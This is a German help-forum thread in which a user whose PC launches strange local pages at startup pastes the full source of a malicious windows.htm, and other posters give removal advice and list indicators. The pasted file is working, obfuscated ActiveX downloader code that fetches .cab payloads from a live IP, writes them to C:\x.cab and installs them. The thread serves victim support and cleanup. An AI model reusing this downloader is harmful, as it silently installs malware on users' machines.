Hi Leute!
Ich hab jetzt die letzten 2 Stunden damit verbracht, das Netz zu begoogeln und bin dennoch zu keinem Ergebnis gekommen.
Mein Problem ist, dass beim Start von Windows sich 2x der Firefox öffnet mit 2 lokalen .htm Dateien. Die eine heisst windows.htm, die andere update.htm. Ich habe bereits versucht, sie zu löschen, doch sie sind beim nächsten booten wieder da. Ich habe ausserdem bitdefender, spybot s&d, spysweeper und xp-antispy (was aber glaub nix dazu sagt) ausprobiert, alles ohne wirklichen Erfolg. Habe auch schon mit tuneup alles unnötige aus dem Autostart entfernt, aber zu meinem Trojaner/Virus/Wurm/... hat es nix gesagt...

Ich poste mal den Inhalt der windows.htm, welche die meines Erachtens nach die üblere der beiden ist, da die andere Seite bloss ein "File not found" faked und die windows.htm versucht auf die Platte zu schreiben. Also hier der Code der windows.htm:

Code: Alles auswählenAufklappen

ATTFilter

<HTML>
<HEAD>
<SCRIPT>

cust='6'
antivir='0';
mt='0';
lc='0';






	function dl(u) {

		try {

	        eval("x = new Activ"+"eXObject('Mic"+"rosoft.XM"+"LHTTP')"); 

    		x.Open("GET",u,0); 

    		x.Send(); 

			eval("s = new Activ"+"eXObject('ADOD"+"B.Stream')");

			eval("s.M"+"ode = 3");

			eval("s.T"+"ype = 1");

			eval("s.O"+"pen()");

			eval("s.W"+"rite(x.responseBody)");

			eval('s.S'+'aveToFile("C:\\\\x.cab",2)');

		}

		catch(ex) { }

	}





	dl('http://216.74.97.200/~techno/files/explorer'+cust+'.cab');

    

	</SCRIPT>

<META content="MSHTML 6.00.2800.1106" name=GENERATOR></HEAD>
<BODY>
<OBJECT id=i codeBase=c:/x.cab 
classid=clsid:11111111-1111-1111-1111-511111114362></OBJECT>
<SCRIPT>

		dl('http://216.74.97.200/~techno/files/777.cab');

    

	</SCRIPT>

<OBJECT id=i codeBase=c:/x.cab 
classid=clsid:11111111-1111-1111-1111-511111114362></OBJECT>
<SCRIPT>

	if (antivir == 0 && mt == 0) {

		dl('http://216.74.97.200/~techno/files/MediaTicketsInstaller.cab');



		num = new Array(13);

		num[0] = "4362";
		num[1] = "4362";
                num[2] = "4362";
                num[3] = "4362";
                num[4] = "4362";
                num[5] = "4362";
                num[6] = "4362";
                num[7] = "4362";
                num[8] = "4362";
                num[9] = "4362";
                num[10] = "4362";
                num[11] = "4362";
                num[12] = "4362";
		


		idN = Math.floor(Math.random() * num.length);

		document.write('<OBJECT ID="MediaTicketsInstallerDemo" WIDTH=0 HEIGHT=0 CLASSID="CLSID:9EB320CE-BE1D-4304-A081-4B466'+'5414BEF" CODEBASE="c:/x.cab"><PARAM NAME="rid" VALUE='+num[idN]+'></OBJECT>');

	}



	</SCRIPT>
</BODY>
</HTML>
         

Es wäre schön wenn mir jemand damit weiterhelfen könnte. Den Inhalt des HijackThis logs wollte ich noch nicht posten, vielleicht gehts ja auch ohne. Aber bei Bedarf mach ich das natürlich gerne!
Danke schonmal im Voraus!
Grüßle, der Christian

Keiner der am Markt angebotenen Virenscanner ist perfekt. Es ist deshalb eine gute Idee mit einem zweiten oder dritten Antivirenprogramm zu scannen. Sehr leistungsfähige (kostenlose) Virenscanner sind escan (Kaspersky Engine) und BitdefenderFree.

Da aber alle Virenscanner Probleme mit Trojanern und Spyware haben, grundsätzlich mit Spyware- und Trojanerscanner zusätzlich prüfen: Spybot Search&Destroy und a² (emisoft). Für alle eingesetzten Programme gilt: Vor dem Einsatz aktualisieren (updaten)!

Dannach checken mit HijackThis und MSConfig.

Dann Systemwiederherstellung (nur Windows XP) deaktivieren und im abgesicherten Modus booten. Nochmal Virenscanner, Spybot und a² drüber laufen lassen und mit HijackThis überprüfen/fixen. Wenn keine Fehler mehr, neu booten und die Systemwiederherstellung wieder aktivieren.

Eine Garantie, dass der Schädling weg ist, hast du aber nicht. Hier hilft nur Formatieren und Neuinstallation der Festplatte. Eine Anleitung findest du hier http://www.trojaner-board.de/showthread.php?t=16918.


Du solltest dir aber mal grundlegende Gedanken machen, warum du den Schädling bekommen hast und entsprechende Vorsorgemaßnahmen ergreifen (Stichwort 10 goldene Regeln).

Infos und Downloads zum Thema findest du auf der Webpage http://www.comsafe.de

hab zwar keine ahnung von firefox...aber wie wärs mit restlos entfernen, und die aktuelle firefox version installieren....was man so liest in letzter zeit sind da ständig veränderungen...(über firexox und co)

@azazel_7
Vom Programmieren verstehe ich nur Bahnhof, aber:
1. Diese Seite enthalt einen AktiveX-Befehl zum DL von MediaTicketsInstaller.cab von der Seite h**p://216.74.97.200/~techno/files/.
2. Dieses Bereinigungsprogramm hilft dir, den ganzen Müll aus den Temp-Ordner und Papierkorb zu entfernen.
3. Die Dateien
c:/x.cab
und ggf. ..\MediaTicketsInstaller.cab
sollst du suchen und eliminieren.
4. Die Einträge mit diesen Zeichenfolgen über HJT fixen.

Zitat:

h**p://216.74.97.200/~techno/files/explorer
clsid:11111111-1111-1111-1111-511111114362
h**p://216.74.97.200/~techno/files/MediaTicketsInstaller.cab

5. Die andere htm-Datei musst du selbst analysieren oder doch den HJT-Log posten.